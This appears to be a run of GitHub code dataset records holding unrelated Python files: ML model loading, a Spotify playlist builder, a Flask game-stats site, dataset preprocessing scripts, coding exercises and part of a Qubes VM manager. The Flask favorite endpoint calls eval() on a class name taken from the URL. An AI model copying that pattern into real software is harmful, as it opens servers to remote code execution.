use_auth_token=hf_auth\n)\n\nmodel = transformers.AutoModelForCausalLM.from_pretrained(\n model_id,\n trust_remote_code=True,\n config=model_config,\n quantization_config=bnb_config,\n device_map='auto',\n use_auth_token=hf_auth\n)\nmodel.eval()\nprint(f\"Model loaded on {device}\")","repo_name":"madhurish/retrival_augmented_llm","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37591579337","text":"import requests\nfrom bs4 import BeautifulSoup\nimport spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv(\"../../EnvVar/.env.txt\")\n\nClient_ID = os.getenv(\"CLIENT_ID\")\nClient_Secret = os.getenv(\"CLIENT_SECRET\")\nRedirect_Url = os.getenv(\"REDIRECT_URL\")\n\ndate = input(\"Billboard Hot 100 Date (YYYY-MM-DD in this format): \")\nresponse = requests.get(f\"https://www.billboard.com/charts/hot-100/{date}\")\nresponse.raise_for_status()\nsoup = BeautifulSoup(response.text, \"html.parser\")\n\nsongs = soup.select(\"li h3\", class_=\"c-title\")\n\nsong_list = [song.getText().strip() for song in songs]\n\n# Spotify Authentication\nsp = spotipy.Spotify(\n auth_manager=SpotifyOAuth(\n client_id=Client_ID,\n client_secret=Client_Secret,\n redirect_uri=Redirect_Url,\n scope=\"playlist-modify-private\"))\n\nuser_id = sp.current_user()[\"id\"]\n\nyear = date.split(\"-\")[0]\nsong_uris = []\n\nfor song in song_list:\n result = sp.search(q=f\"track:{song} year:{year}\", type=\"track\")\n try:\n uri = result[\"tracks\"][\"items\"][0][\"uri\"]\n song_uris.append(uri)\n except IndexError:\n print(f\"In Spotify {song} doesn't exist.\")\n\nplaylist = sp.user_playlist_create(user=user_id, name=f\"{date} Billboard 100\", public=False)\nprint(playlist)\n\nsp.playlist_add_items(playlist_id=playlist[\"id\"], items=song_uris)\n","repo_name":"aysenurekentok/100-days-of-code-python","sub_path":"day-46-billboard-hot-100-spotify-list/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3372420208","text":"from flask import request, jsonify, render_template, make_response\nfrom app import app\nimport os, sys, json\n\nsys.path.append(\"%s/../src\" % os.path.dirname(os.path.realpath(__file__)))\n\nfrom models import *\nimport tools\n\n@app.template_global()\ndef active_pages():\n return [\n 'matches',\n 'worlds',\n 'guilds',\n 'emblems'\n ]\n\n@app.route('/')\n@app.route('/index')\ndef index():\n matches = Match.get_current()\n resp = make_response(render_template('index.html', **locals()))\n resp.set_cookie('Test_Cookie', 'This is a cookie value')\n return resp\n\n@app.route('/matches')\n@app.route('/matches/<int:match_id>')\ndef matches(match_id=None):\n if match_id is not None:\n match = Match.get(Match.id==match_id)\n else:\n match = None\n matches = Match.get_current()\n\n return render_template('matches.html', **locals())\n\n@app.route('/worlds')\n@app.route('/worlds/<int:world_id>')\ndef worlds(world_id=None):\n if world_id is not None:\n world = World.get(World.id==world_id)\n else:\n world = None\n worlds = World.select()\n\n resp = make_response(render_template('worlds.html', **locals()))\n\n if world is not None:\n resp.set_cookie('World_visited', world.name, expires=datetime.utcnow() + timedelta(days=365))\n\n return resp\n\n@app.route('/guilds')\n@app.route('/guilds/<int:guild_id>')\ndef guilds(guild_id=None):\n if guild_id is not None:\n guild = Guild.get(Guild.id==guild_id)\n else:\n guild = None\n guilds = Guild.select()\n\n return render_template('guilds.html', **locals())\n\n@app.route('/emblems')\n@app.route('/emblems/<int:emblem_id>')\ndef emblems(emblem_id=None):\n if emblem_id is not None:\n emblem = Emblem.get(Emblem.id==emblem_id)\n else:\n emblem = None\n emblems = Emblem.select()\n\n return render_template('emblems.html', **locals())\n\n\nresponse = {\n 'success': False,\n 'errors': []\n}\n\n@app.route('/api/favorite/<action>/<class_name>/<int:id>')\ndef favorite(class_name, action, id):\n fav_cookie = request.cookies.get('favorites')\n\n if fav_cookie:\n favorites = json.loads(fav_cookie)\n else:\n favorites = {}\n\n try:\n obj = eval(class_name.capitalize()).get(id=id)\n\n if action == 'remove':\n if class_name in favorites and id in favorites[class_name]:\n favorites[class_name].remove(id)\n response['success'] = True\n else:\n response['errors'].append(\"Class: '%s' or %s id: %d not in favorites list!\" % (class_name, class_name, id))\n else:\n if class_name not in favorites:\n favorites[class_name] = []\n\n if id not in favorites[class_name]:\n favorites[class_name].append(id)\n response['success'] = True\n else:\n response['errors'].append(\"Already favorited %s %d\" % (class_name, id))\n\n response['favorites'] = favorites\n except:\n response['errors'].append(\"Error initializing class: '%s' with id: %d\" % (class_name, id))\n\n resp = jsonify(response)\n\n if response['success']:\n resp.set_cookie('favorites', json.dumps(favorites))\n\n return resp\n","repo_name":"5290charlie/gw2","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33904337248","text":"import os\nimport pandas as pd\n\n\ndef remove_duplicates(x):\n \"\"\"\n Remove duplicates from dataframe x\n\n This function will remove duplicate values from \n the original dataframe\n\n Return a set\n \"\"\"\n x = x.apply(lambda x: x.split(\", \"))\n x = x.explode()\n x = x.drop_duplicates()\n return set(x)\n\n\ndef categorize_transportations(transportations):\n \"\"\"\n Categorize transportations values by their keyword.\n\n Value with string Bandara will be categorized as airport,\n Value with string Terminal will be categorized as bus_station,\n Value with string Stasiun will be categorized as train_station.\n\n Return dataframes of categorized transportation\n \"\"\"\n airports, bus_stations, train_stations = [], [], []\n\n # loop through set_of_transportation and\n # add value to corresponding variable\n # according to their keyword\n set_of_transportations = remove_duplicates(transportations)\n for x in set_of_transportations:\n keyword = x.split()[0]\n if keyword == \"Bandara\":\n airports.append(x)\n elif keyword == \"Terminal\":\n bus_stations.append(x)\n elif keyword == \"Stasiun\":\n train_stations.append(x)\n\n return pd.DataFrame(data=airports, columns=[\"airport\"]), pd.DataFrame(data=bus_stations, columns=[\"bus_station\"]), pd.DataFrame(data=train_stations, columns=[\"train_station\"])\n\n\ndef explode_datasets(df, idx, col):\n \"\"\"\n Split cell with string that contains multiple data\n By using the explode method provided by pandas\n \"\"\"\n for x in col:\n if x:\n try:\n df[x] = df[x].apply(lambda x: x.split(\", \"))\n except AttributeError:\n df[x] = df[x].apply(lambda x: str(x).split(\", \"))\n\n return df.set_index(idx).apply(pd.Series.explode).reset_index()\n\n\n# read raw dataset\ndir_path = os.getcwd()\nraw_dataset = pd.read_excel(dir_path + \"/datasets/raw_dataset.xlsx\")\n\n# create data frame for knowledge graph entities\nmuseums = raw_dataset.filter([\n \"name\",\n \"address\",\n \"phone_number\",\n \"email\", \"website\",\n \"facebook\",\n \"twitter\",\n \"instagram\",\n \"longitude\",\n \"latitude\"], axis=1)\n\ntickets_1 = raw_dataset.filter([\"ticket_1\"], axis=1).rename(columns={\"ticket_1\":\"ticket\"})\ntickets_2 = raw_dataset.filter([\"ticket_2\"], axis=1).dropna().rename(columns={\"ticket_2\":\"ticket\"})\ntickets = tickets_1.append(tickets_2)\n\n# categorize categorical dataframe\nairports, bus_stations, train_stations = categorize_transportations(\n raw_dataset[\"public_transportation\"])\n\n# remove duplicate data from entities\ncity = raw_dataset[\"city\"].drop_duplicates(inplace=False).copy()\ncategory = raw_dataset[\"category\"].drop_duplicates(inplace=False).copy()\n\nschedule = list(remove_duplicates(raw_dataset[\"schedule_1\"].dropna()))\nschedule = pd.DataFrame(data=schedule, columns=[\"schedule\"])\n\nticket = list(remove_duplicates(tickets[\"ticket\"]))\nticket = pd.DataFrame(data=ticket, columns=[\"ticket\"])\n\n# create dataframe for knowledge graph location relation\nmuseum_location = raw_dataset.filter([\"name\", \"city\"], axis=1)\n\n# create dataframe for knowledge graph museum category relation\nmuseum_category = raw_dataset.filter([\"name\", \"category\"], axis=1)\n\n# create dataframe for knowledge graph transportation relation\nmuseum_transportation = raw_dataset.filter(\n [\"name\", \"public_transportation\", \"distance_to_museum\"], axis=1)\nmuseum_transportation = explode_datasets(museum_transportation, [\"name\"], [\n \"public_transportation\", \"distance_to_museum\"])\n\n# create dataframe for knowledge graph ticket category relation\nmuseum_ticket_1 = raw_dataset.filter(\n [\"name\", \"ticket_1\", \"ticket_price_1\"], axis=1)\nmuseum_ticket_1 = explode_datasets(museum_ticket_1, [\"name\"], [\n \"ticket_1\", \"ticket_price_1\"])\n\nmuseum_ticket_2 = raw_dataset.filter(\n [\"name\", \"ticket_name_2\", \"ticket_2\", \"ticket_price_2\"], axis=1)\nmuseum_ticket_2.dropna(inplace=True, subset=[\"ticket_name_2\"])\nmuseum_ticket_2 = explode_datasets(\n museum_ticket_2, [\"name\", \"ticket_name_2\"], [\"ticket_2\", \"ticket_price_2\"])\n\n# create dataframe for knowledge graph schedule category relation\nmuseum_schedule_1 = raw_dataset.filter(\n [\"name\", \"schedule_1\", \"schedule_name_1\", \"open_1\", \"closed_1\"], axis=1)\nmuseum_schedule_1 = explode_datasets(museum_schedule_1, [\n \"name\", \"schedule_name_1\", \"open_1\", \"closed_1\"], [\"schedule_1\"])\n\nmuseum_schedule_2 = raw_dataset.filter(\n [\"name\", \"schedule_2\", \"schedule_name_2\", \"open_2\", \"closed_2\"], axis=1)\nmuseum_schedule_2.dropna(inplace=True, subset=[\"schedule_2\"])\nmuseum_schedule_2 = explode_datasets(museum_schedule_2, [\n \"name\", \"schedule_name_2\", \"open_2\", \"closed_2\"], [\"schedule_2\"])\n\nmuseum_schedule_3 = raw_dataset.filter(\n [\"name\", \"schedule_3\", \"schedule_name_3\", \"open_3\", \"closed_3\"], axis=1)\nmuseum_schedule_3.dropna(inplace=True, subset=[\"schedule_3\"])\nmuseum_schedule_3 = explode_datasets(museum_schedule_3, [\n \"name\", \"schedule_name_3\", \"open_3\", \"closed_3\"], [\"schedule_3\"])\n\n# write all entities and relations to csv\nmuseums.to_csv(dir_path + \"/datasets/museum.csv\", index=False)\ncity.to_csv(dir_path + \"/datasets/city.csv\", index=False)\ncategory.to_csv(dir_path + \"/datasets/category.csv\", index=False)\nairports.to_csv(dir_path + \"/datasets/airport.csv\", index=False)\nbus_stations.to_csv(dir_path + \"/datasets/bus_station.csv\", index=False)\ntrain_stations.to_csv(dir_path + \"/datasets/train_station.csv\", index=False)\nticket.to_csv(dir_path + \"/datasets/ticket.csv\", index=False)\nschedule.to_csv(dir_path + \"/datasets/schedule.csv\", index=False)\nmuseum_location.to_csv(\n dir_path + \"/datasets/museum_location.csv\", index=False)\nmuseum_category.to_csv(\n dir_path + \"/datasets/museum_category.csv\", index=False)\nmuseum_transportation.to_csv(\n dir_path + \"/datasets/museum_transportation.csv\", index=False)\nmuseum_ticket_1.to_csv(\n dir_path + \"/datasets/museum_ticket_1.csv\", index=False)\nmuseum_ticket_2.to_csv(\n dir_path + \"/datasets/museum_ticket_2.csv\", index=False)\nmuseum_schedule_1.to_csv(\n dir_path + \"/datasets/museum_schedule_1.csv\", index=False)\nmuseum_schedule_2.to_csv(\n dir_path + \"/datasets/museum_schedule_2.csv\", index=False)\nmuseum_schedule_3.to_csv(\n dir_path + \"/datasets/museum_schedule_3.csv\", index=False)\n","repo_name":"reykim7854/museum_recsys_chatbot","sub_path":"scripts/typedb_scripts/split_dataset.py","file_name":"split_dataset.py","file_ext":"py","file_size_in_byte":6383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10941133421","text":"## My solution\ndef is_isogram(string):\n #your code here\n if type(string) != str:\n raise TypeError('Argument should be a string')\n\n elif string == \"\":\n return True\n else:\n string = string.lower()\n repeat = 0\n for char in string:\n if string.count(char) > 1:\n repeat += 1\n if repeat > 0:\n return False\n else:\n return True\n\n#Best Practice\ndef isogram(n):\n if not isinstance(n, str):\n return False\n elif len(n) < 1:\n return True\n n = n.lower()\n if len(n) == len(set(n)): ## we check if the length of the input is equal to the length of the set(n). \n return True\n else:\n return False\n\n# The function set() converts a collection or a sequence or an iterator object into a set. \n# For example: set('lists') returns {'s', 't', 'l', 'i'}, as you can see the letter 's' which appears twice in 'lists', does not appear in the set. \n# This is useful to check if the length of the set is equal to the length of the input, if there is a letter which appears twice in the input the condition is False.\n","repo_name":"sandyhsia/codeWarwww","sub_path":"string中的重复字符.py","file_name":"string中的重复字符.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22638700548","text":"# 출석번호가 1,2,3,4. 앞에 100을 붙이기로함. -> 101, 102, 103, 104.\nstudents = [1, 2, 3, 4]\nstudents = [i + 100 for i in students]\nprint(students) # [101, 102, 103, 104]\n\n# 학생이름을 길이로 변환\nstudents = [\"karina\", \"winter\", \"ningning\"]\nstudents = [len(i) for i in students]\nprint(students) # [6, 6, 8]\n\n# 학생이름을 대문자로 변환\nstudents = [\"karina\", \"winter\", \"ningning\"]\nstudents = [i.upper() for i in students]\nprint(students) # ['KARINA', 'WINTER', 'NINGNING']\n","repo_name":"Hanseul516/Python","sub_path":"Study/14_한줄for.py","file_name":"14_한줄for.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74986490826","text":"import turtle, random\r\nfrom worksheet_math_squares_line import random_color, square\r\n \r\ndef roots(a, b, c):\r\n '''\r\n roots determines and prints the roots of a quadratic equation with \r\n coefficients a, b, and c. It returns None.\r\n '''\r\n discriminant = b**2 - 4 * a * c\r\n print(\"discriminant:\", discriminant)\r\n root_disc = math.sqrt(discriminant)\r\n root1 = (-b + root_disc) / (2 * a)\r\n root2 = (-b - root_disc) / (2 * a)\r\n print(root1, root2)\r\n \r\ndef main():\r\n '''\r\n Draw a number determined by the user of \r\n squares of random color in random places.\r\n '''\r\n azt = turtle.Turtle()\r\n turtle.bgcolor('black')\r\n azt.shape('turtle')\r\n azt.speed(0)\r\n azt.pensize(5)\r\n for i in range(100):\r\n random_color(azt)\r\n x = random.randrange(701) - 400\r\n y = random.randrange(501) - 300\r\n azt.penup()\r\n azt.goto(x, y)\r\n azt.pendown()\r\n azt.begin_fill()\r\n square(azt, random.randint(1, 100))\r\n azt.end_fill()\r\n \r\n turtle.getscreen().exitonclick()\r\n \r\nif __name__ == \"__main__\":\r\n main()","repo_name":"Gavand/Python","sub_path":"py6/random_squares_roots.py","file_name":"random_squares_roots.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"33949262763","text":"# image_id class_id super_class_id super_class_name path filename\n# 1 1 1 bicycle bicycle_final 111085122871_0.JPG\nimport os\nimport shutil\n\ndef mkdir(dir_path, dir_name, forced_remove=False):\n\tnew_dir = '{}/{}'.format(dir_path,dir_name)\n\tif forced_remove and os.path.isdir( new_dir ):\n\t\tshutil.rmtree( new_dir )\n\tif not os.path.isdir( new_dir ):\n\t\tos.makedirs( new_dir )\n\ndef touch(file_path, file_name, forced_remove=False):\n\tnew_file = '{}/{}'.format(file_path,file_name)\n\tassert os.path.isdir( file_path ), ' \\\"{}\\\" does not exist.'.format(file_path)\n\tif forced_remove and os.path.isfile(new_file):\n\t\tos.remove(new_file)\n\tif not os.path.isfile(new_file):\n\t\topen(new_file, 'a').close()\n\ndef write_file(file_path, file_name, content, new_line=True, forced_remove_prev=False):\n\ttouch(file_path, file_name, forced_remove=forced_remove_prev)\n\twith open('{}/{}'.format(file_path, file_name), 'a') as f:\n\t\tf.write('{}'.format(content))\n\t\tif new_line:\n\t\t\tf.write('\\n')\n\t\tf.close()\n\ndef copy_file(src_path, src_file_name, dst_path, dst_file_name):\n\tshutil.copyfile('{}/{}'.format(src_path, src_file_name), '{}/{}'.format(dst_path,dst_file_name)) \n\ndef ls(dir_path):\n\treturn os.listdir(dir_path)\n \ndef get_dicts(raw_data_path, info_file_name):\n superclass_ids = list()\n images = dict()\n images_path = dict()\n\n for ix, (line) in enumerate(open('{}/{}'.format(raw_data_path, info_file_name))):\n if ix==0:\n continue\n image_id, class_id, superclass_id, path = line.split()\n file_path, file_name = os.path.split(path)\n if superclass_id not in superclass_ids:\n superclass_ids.append( superclass_id )\n images[superclass_id] = dict()\n \n if class_id not in images[superclass_id].keys():\n images[superclass_id][class_id] = list()\n\n images[superclass_id][class_id].append(image_id)\n images_path[image_id] = ( ('{}/{}'.format(raw_data_path, file_path), file_name) )\n \n return images_path, images, superclass_ids\n\ndef preprocess(data_mode, saving_path, images, images_path, super_class_ids, saving_points=(0., 1.) ):\n assert data_mode in ['train', 'val', 'test'], 'data_mode must be one of [\"train\", \"val\", \"test\"]'\n assert saving_points[0]<= saving_points[1] and saving_points[0]>=0. and saving_points[1]<=1. , '**** Error: 0. <= saving_point[0] <= saving_point[1] <= 1'\n \n mkdir(saving_path, data_mode)\n mkdir('{}/{}'.format(saving_path, data_mode), 'images')\n touch('{}/{}'.format(saving_path, data_mode), 'images_info.txt')\n touch('{}/{}'.format(saving_path, data_mode), 'super_class_ids.txt')\n for super_class_id in super_class_ids:\n write_file('{}/{}'.format(saving_path, data_mode), 'super_class_ids.txt', '{}'.format(super_class_id))\n\n for ix, (super_class_id) in enumerate(images.keys()):\n start_offset = int( len(images[super_class_id].keys()) * saving_points[0] )\n end_offset = int( len(images[super_class_id].keys()) * saving_points[1] )\n num_super_class_data = end_offset - start_offset\n # print(start_offset, end_offset, num_super_class_data)\n\n for jx, (class_id) in enumerate(images[super_class_id].keys()):\n if jx < start_offset:\n continue\n if jx > end_offset:\n break\n\n class_images = images[super_class_id][class_id]\n \n for kx, (image_id) in enumerate(class_images):\n image_path, image_name = images_path[image_id]\n copy_file(image_path, image_name, '{}/{}/images'.format(saving_path, data_mode), image_name)\n image_info = '{} {} {} {}'.format(super_class_id, class_id, image_id, image_name)\n write_file( '{}/{}'.format(saving_path, data_mode), 'images_info.txt', image_info )\n print('%s: super class: %s( %d/%d(%.2f%%) ), class: %s( %d/%d(%.2f%%) )' % (\n data_mode,\n super_class_id,\n ix+1,\n len(images.keys()),\n (ix+1) / len(images.keys()) * 100,\n class_id,\n jx-start_offset+1,\n num_super_class_data,\n (jx-start_offset+1)/(num_super_class_data)*100\n ), end='\\r'\n )\n print()\n\ndef _main():\n train_raw_datapath, train_info_file_name, train_saving_path, train_saving_points = ( 'Stanford_Online_Products', 'Ebay_train.txt', '.', (0., 0.8) )\n val_saving_path, val_saving_points = ( '.', (0.8, 1.) )\n test_raw_datapath, test_info_file_name, test_saving_path, test_saving_points = ( 'Stanford_Online_Products', 'Ebay_test.txt', '.', (0., 1.) )\n\n train_images_path, train_images, train_super_class_ids = get_dicts(train_raw_datapath, train_info_file_name)\n test_images_path, test_images, test_super_class_ids = get_dicts(test_raw_datapath, test_info_file_name)\n val_images, val_images_path, val_super_class_ids = (train_images, train_images_path, train_super_class_ids)\n\n preprocess('train', train_saving_path, train_images, train_images_path, train_super_class_ids, train_saving_points)\n preprocess('val', val_saving_path, val_images, val_images_path, val_super_class_ids, val_saving_points)\n preprocess('test', test_saving_path, test_images, test_images_path, test_super_class_ids, test_saving_points)\n\nif __name__ == \"__main__\":\n _main()\n\n","repo_name":"ahedayat/FastAP","sub_path":"datasets/standford_online_products/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"73395790344","text":"import calibrationClass as cc\nimport pixieBinParser as pp\n\nclass recon:\n\n def __init__(self, calibration=None):\n\n '''\n File: recontstructionClass.py\n Author: Anders Priest\n Description: This class should be used for mapping any number of events\n given a calibration object. The calibration will be used to map the\n events, both the positions and the energies, then store the data\n in histograms as well as in raw form.\n '''\n\n self.calibration = calibration\n\n def mapEvents(self, fname=None, folderName=None):\n\n if fname != None:\n\n prsr = pp.pixieParser(fname=fname,\n moduleNum=self.calibration.moduleNum,\n channelNum=self.calibration.channelNum)\n\n prsr.readBinFile()\n\n eventList = prsr.makeAndWriteEvents()\n\n for e in eventList:\n\n x = self.calibration.mapEvent(e=e)\n","repo_name":"appriest/proximity","sub_path":"RTDataProcessing/recontstructionClass.py","file_name":"recontstructionClass.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14418278531","text":"from django import forms\nfrom .widgets import SimpleMDE\nfrom .models import Post, Comment\n\n\nclass ArticleAdminModelForm(forms.ModelForm):\n markdown_text = forms.CharField(widget=SimpleMDE())\n\nclass PostForm(forms.ModelForm):\n class Meta:\n model = Post\n fields = '__all__'\n widgets = {\n 'markdown_text':SimpleMDE(),\n }\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ['name', 'email', 'content',]\n","repo_name":"simon-ding/django_blog","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"20868780170","text":"import sys\nimport os\nimport os.path\nimport subprocess\nimport time\nfrom datetime import datetime, timedelta\nimport traceback\n\nfrom qubesadmin import Qubes\nfrom qubesadmin import exc\n\nfrom PyQt4 import QtGui # pylint: disable=import-error\nfrom PyQt4 import QtCore # pylint: disable=import-error\n\nfrom . import ui_qubemanager # pylint: disable=no-name-in-module\nfrom . import thread_monitor\nfrom . import table_widgets\nfrom . import settings\nfrom . import global_settings\nfrom . import restore\nfrom . import backup\nfrom . import log_dialog\nimport threading\n\nfrom qubesmanager.about import AboutDialog\n\n\nclass SearchBox(QtGui.QLineEdit):\n def __init__(self, parent=None):\n super(SearchBox, self).__init__(parent)\n self.focusing = False\n\n def focusInEvent(self, e): # pylint: disable=invalid-name\n super(SearchBox, self).focusInEvent(e)\n self.selectAll()\n self.focusing = True\n\n def mousePressEvent(self, e): # pylint: disable=invalid-name\n super(SearchBox, self).mousePressEvent(e)\n if self.focusing:\n self.selectAll()\n self.focusing = False\n\n\nclass VmRowInTable(object):\n # pylint: disable=too-few-public-methods\n\n def __init__(self, vm, row_no, table):\n self.vm = vm\n self.row_no = row_no\n # TODO: replace a various different widgets with a more generic\n # VmFeatureWidget or VMPropertyWidget\n\n table_widgets.row_height = VmManagerWindow.row_height\n table.setRowHeight(row_no, VmManagerWindow.row_height)\n\n self.type_widget = table_widgets.VmTypeWidget(vm)\n table.setCellWidget(row_no, VmManagerWindow.columns_indices['Type'],\n self.type_widget)\n table.setItem(row_no, VmManagerWindow.columns_indices['Type'],\n self.type_widget.table_item)\n\n self.label_widget = table_widgets.VmLabelWidget(vm)\n table.setCellWidget(row_no, VmManagerWindow.columns_indices['Label'],\n self.label_widget)\n table.setItem(row_no, VmManagerWindow.columns_indices['Label'],\n self.label_widget.table_item)\n\n self.name_widget = table_widgets.VmNameItem(vm)\n table.setItem(row_no, VmManagerWindow.columns_indices['Name'],\n self.name_widget)\n\n self.info_widget = table_widgets.VmInfoWidget(vm)\n table.setCellWidget(row_no, VmManagerWindow.columns_indices['State'],\n self.info_widget)\n table.setItem(row_no, VmManagerWindow.columns_indices['State'],\n self.info_widget.table_item)\n\n self.template_widget = table_widgets.VmTemplateItem(vm)\n table.setItem(row_no, VmManagerWindow.columns_indices['Template'],\n self.template_widget)\n\n self.netvm_widget = table_widgets.VmNetvmItem(vm)\n table.setItem(row_no, VmManagerWindow.columns_indices['NetVM'],\n self.netvm_widget)\n\n self.size_widget = table_widgets.VmSizeOnDiskItem(vm)\n table.setItem(row_no, VmManagerWindow.columns_indices['Size'],\n self.size_widget)\n\n self.internal_widget = table_widgets.VmInternalItem(vm)\n table.setItem(row_no, VmManagerWindow.columns_indices['Internal'],\n self.internal_widget)\n\n self.ip_widget = table_widgets.VmIPItem(vm)\n table.setItem(row_no, VmManagerWindow.columns_indices['IP'],\n self.ip_widget)\n\n self.include_in_backups_widget = \\\n table_widgets.VmIncludeInBackupsItem(vm)\n table.setItem(row_no, VmManagerWindow.columns_indices[\n 'Backups'], self.include_in_backups_widget)\n\n self.last_backup_widget = table_widgets.VmLastBackupItem(vm)\n table.setItem(row_no, VmManagerWindow.columns_indices[\n 'Last backup'], self.last_backup_widget)\n\n def update(self, update_size_on_disk=False):\n \"\"\"\n Update info in a single VM row\n :param update_size_on_disk: should disk utilization be updated? the\n widget will extract the data from VM object\n :return: None\n \"\"\"\n self.info_widget.update_vm_state(self.vm)\n if update_size_on_disk:\n self.size_widget.update()\n\n\nvm_shutdown_timeout = 20000 # in msec\nvm_restart_check_timeout = 1000 # in msec\n\n\nclass VmShutdownMonitor(QtCore.QObject):\n def __init__(self, vm, shutdown_time=vm_shutdown_timeout,\n check_time=vm_restart_check_timeout,\n and_restart=False, caller=None):\n QtCore.QObject.__init__(self)\n self.vm = vm\n self.shutdown_time = shutdown_time\n self.check_time = check_time\n self.and_restart = and_restart\n self.shutdown_started = datetime.now()\n self.caller = caller\n\n def restart_vm_if_needed(self):\n if self.and_restart and self.caller:\n self.caller.start_vm(self.vm)\n\n def check_again_later(self):\n # noinspection PyTypeChecker,PyCallByClass\n QtCore.QTimer.singleShot(self.check_time, self.check_if_vm_has_shutdown)\n\n def timeout_reached(self):\n actual = datetime.now() - self.shutdown_started\n allowed = timedelta(milliseconds=self.shutdown_time)\n\n return actual > allowed\n\n def check_if_vm_has_shutdown(self):\n vm = self.vm\n vm_is_running = vm.is_running()\n try:\n vm_start_time = datetime.fromtimestamp(float(vm.start_time))\n except (AttributeError, TypeError, ValueError):\n vm_start_time = None\n\n if vm_is_running and vm_start_time \\\n and vm_start_time < self.shutdown_started:\n if self.timeout_reached():\n reply = QtGui.QMessageBox.question(\n None, self.tr(\"Qube Shutdown\"),\n self.tr(\n \"The Qube <b>'{0}'</b> hasn't shutdown within the last \"\n \"{1} seconds, do you want to kill it?<br>\").format(\n vm.name, self.shutdown_time / 1000),\n self.tr(\"Kill it!\"),\n self.tr(\"Wait another {0} seconds...\").format(\n self.shutdown_time / 1000))\n if reply == 0:\n vm.kill()\n self.restart_vm_if_needed()\n else:\n self.shutdown_started = datetime.now()\n self.check_again_later()\n else:\n self.check_again_later()\n else:\n if vm_is_running:\n # Due to unknown reasons, Xen sometimes reports that a domain\n # is running even though its start-up timestamp is not valid.\n # Make sure that \"restart_vm_if_needed\" is not called until\n # the domain has been completely shut down according to Xen.\n self.check_again_later()\n return\n\n self.restart_vm_if_needed()\n\n\nclass VmManagerWindow(ui_qubemanager.Ui_VmManagerWindow, QtGui.QMainWindow):\n # pylint: disable=too-many-instance-attributes\n row_height = 30\n column_width = 200\n search = \"\"\n # suppress saving settings while initializing widgets\n settings_loaded = False\n columns_indices = {\"Type\": 0,\n \"Label\": 1,\n \"Name\": 2,\n \"State\": 3,\n \"Template\": 4,\n \"NetVM\": 5,\n \"Size\": 6,\n \"Internal\": 7,\n \"IP\": 8,\n \"Backups\": 9,\n \"Last backup\": 10,\n }\n\n def __init__(self, qubes_app, qt_app, parent=None):\n # pylint: disable=unused-argument\n super(VmManagerWindow, self).__init__()\n self.setupUi(self)\n\n self.manager_settings = QtCore.QSettings(self)\n\n self.qubes_app = qubes_app\n self.qt_app = qt_app\n\n self.searchbox = SearchBox()\n self.searchbox.setValidator(QtGui.QRegExpValidator(\n QtCore.QRegExp(\"[a-zA-Z0-9-]*\", QtCore.Qt.CaseInsensitive), None))\n self.searchContainer.addWidget(self.searchbox)\n\n self.connect(self.table, QtCore.SIGNAL(\"itemSelectionChanged()\"),\n self.table_selection_changed)\n\n self.table.setColumnWidth(0, self.column_width)\n\n self.sort_by_column = \"Type\"\n self.sort_order = QtCore.Qt.AscendingOrder\n\n self.vms_list = []\n self.vms_in_table = {}\n\n self.frame_width = 0\n self.frame_height = 0\n\n self.move(self.x(), 0)\n\n self.columns_actions = {\n self.columns_indices[\"Type\"]: self.action_vm_type,\n self.columns_indices[\"Label\"]: self.action_label,\n self.columns_indices[\"Name\"]: self.action_name,\n self.columns_indices[\"State\"]: self.action_state,\n self.columns_indices[\"Template\"]: self.action_template,\n self.columns_indices[\"NetVM\"]: self.action_netvm,\n self.columns_indices[\"Size\"]: self.action_size_on_disk,\n self.columns_indices[\"Internal\"]: self.action_internal,\n self.columns_indices[\"IP\"]: self\n .action_ip, self.columns_indices[\"Backups\"]: self\n .action_backups, self.columns_indices[\"Last backup\"]: self\n .action_last_backup\n }\n\n self.visible_columns_count = len(self.columns_indices)\n\n self.table.setColumnWidth(self.columns_indices[\"State\"], 80)\n self.table.setColumnWidth(self.columns_indices[\"Name\"], 150)\n self.table.setColumnWidth(self.columns_indices[\"Label\"], 40)\n self.table.setColumnWidth(self.columns_indices[\"Type\"], 40)\n self.table.setColumnWidth(self.columns_indices[\"Size\"], 100)\n self.table.setColumnWidth(self.columns_indices[\"Internal\"], 60)\n self.table.setColumnWidth(self.columns_indices[\"IP\"], 100)\n self.table.setColumnWidth(self.columns_indices[\"Backups\"], 60)\n self.table.setColumnWidth(self.columns_indices[\"Last backup\"], 90)\n\n self.table.horizontalHeader().setResizeMode(\n QtGui.QHeaderView.Interactive)\n self.table.horizontalHeader().setStretchLastSection(True)\n\n self.table.sortItems(self.columns_indices[self.sort_by_column],\n self.sort_order)\n\n self.context_menu = QtGui.QMenu(self)\n\n self.context_menu.addAction(self.action_settings)\n self.context_menu.addAction(self.action_editfwrules)\n self.context_menu.addAction(self.action_appmenus)\n self.context_menu.addAction(self.action_set_keyboard_layout)\n self.context_menu.addSeparator()\n\n self.context_menu.addAction(self.action_updatevm)\n 